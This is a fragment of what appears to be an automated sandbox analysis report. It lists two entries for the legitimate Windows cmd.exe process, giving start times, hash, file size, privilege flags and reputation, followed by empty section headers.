                                              Start time:06:49:16
                                              Start date:04/05/2021
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe
                                              Imagebase:0x49d70000
                                              File size:345088 bytes
                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:06:49:24
                                              Start date:04/05/2021
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe
                                              Imagebase:0x49d70000
                                              File size:345088 bytes
                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >